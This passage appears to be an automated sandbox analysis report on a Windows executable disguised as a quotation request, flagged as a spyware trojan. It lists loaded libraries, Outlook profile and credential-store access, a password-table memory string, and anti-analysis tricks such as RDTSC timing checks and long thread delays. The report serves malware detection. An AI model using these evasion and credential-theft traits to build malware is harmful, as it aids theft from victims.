            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF77E010_2_36DF77E0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF049810_2_36DF0498
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF049710_2_36DF0497
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF848110_2_36DF8481
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF15F810_2_36DF15F8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF15F710_2_36DF15F7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF359810_2_36DF3598
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF358810_2_36DF3588
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF22FF10_2_36DF22FF
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF429F10_2_36DF429F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF42A010_2_36DF42A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF230010_2_36DF2300
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF004010_2_36DF0040
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF003F10_2_36DF003F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DFE03010_2_36DFE030
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DFE02010_2_36DFE020
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF119010_2_36DF1190
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF11A010_2_36DF11A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF314010_2_36DF3140
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF313F10_2_36DF313F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF612510_2_36DF6125
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF1EA810_2_36DF1EA8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF1EA710_2_36DF1EA7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF3E4810_2_36DF3E48
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF3E3810_2_36DF3E38
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF7E3010_2_36DF7E30
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF4FA810_2_36DF4FA8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF4FA710_2_36DF4FA7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF2CD810_2_36DF2CD8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF2CE810_2_36DF2CE8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF0D4810_2_36DF0D48
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF0D4710_2_36DF0D47
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF8AD810_2_36DF8AD8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF8ACA10_2_36DF8ACA
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF1A5010_2_36DF1A50
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF1A4F10_2_36DF1A4F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF4B5010_2_36DF4B50
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF4B4010_2_36DF4B40
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF98C010_2_36DF98C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF08F010_2_36DF08F0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF08EF10_2_36DF08EF
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF289010_2_36DF2890
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF287F10_2_36DF287F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF39F010_2_36DF39F0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_36DF39EF10_2_36DF39EF
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_37E5E60010_2_37E5E600
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_37E5D47810_2_37E5D478
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 10_2_37E573D010_2_37E573D0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: String function: 00402B3A appears 47 times
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs REQUEST FOR QUOATION AND PRICES.exe
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556465993.0000000034A37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs REQUEST FOR QUOATION AND PRICES.exe
            Source: REQUEST FOR QUOATION AND PRICES.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_004045CA
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_0040206A CoCreateInstance,5_2_0040206A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile created: C:\Users\user\selvsikkerJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeMutant created: NULL
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsy8112.tmpJump to behavior
            Source: REQUEST FOR QUOATION AND PRICES.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C43000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C25000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C64000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C35000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C58000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2557594376.0000000035B6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: REQUEST FOR QUOATION AND PRICES.exeReversingLabs: Detection: 13%
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile read: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000005.00000002.1644205426.00000000050C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,5_2_00406254
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeCode function: 5_2_10002DA0 push eax; ret 5_2_10002DCE
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeFile created: C:\Users\user\AppData\Local\Temp\nsz829B.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeAPI/Special instruction interceptor: Address: 57E3F2E
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeAPI/Special instruction interceptor: Address: 3D93F2E
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeRDTSC instruction interceptor: First address: 57A3A5C second address: 57A3A5C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD7CCE42CC2h 0x00000006 test dx, cx 0x00000009 inc ebp 0x0000000a test bl, al 0x0000000c inc ebx 0x0000000d test bx, ax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeRDTSC instruction interceptor: First address: 3D53A5C second address: 3D53A5C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FD7CD58AE72h 0x00000006 test dx, cx 0x00000009 inc ebp 0x0000000a test bl, al 0x0000000c inc ebx 0x0000000d test bx, ax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeMemory allocated: 34B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeMemory allocated: 34840000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599451Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exeThread delayed: delay time: 598906Jump to behavior
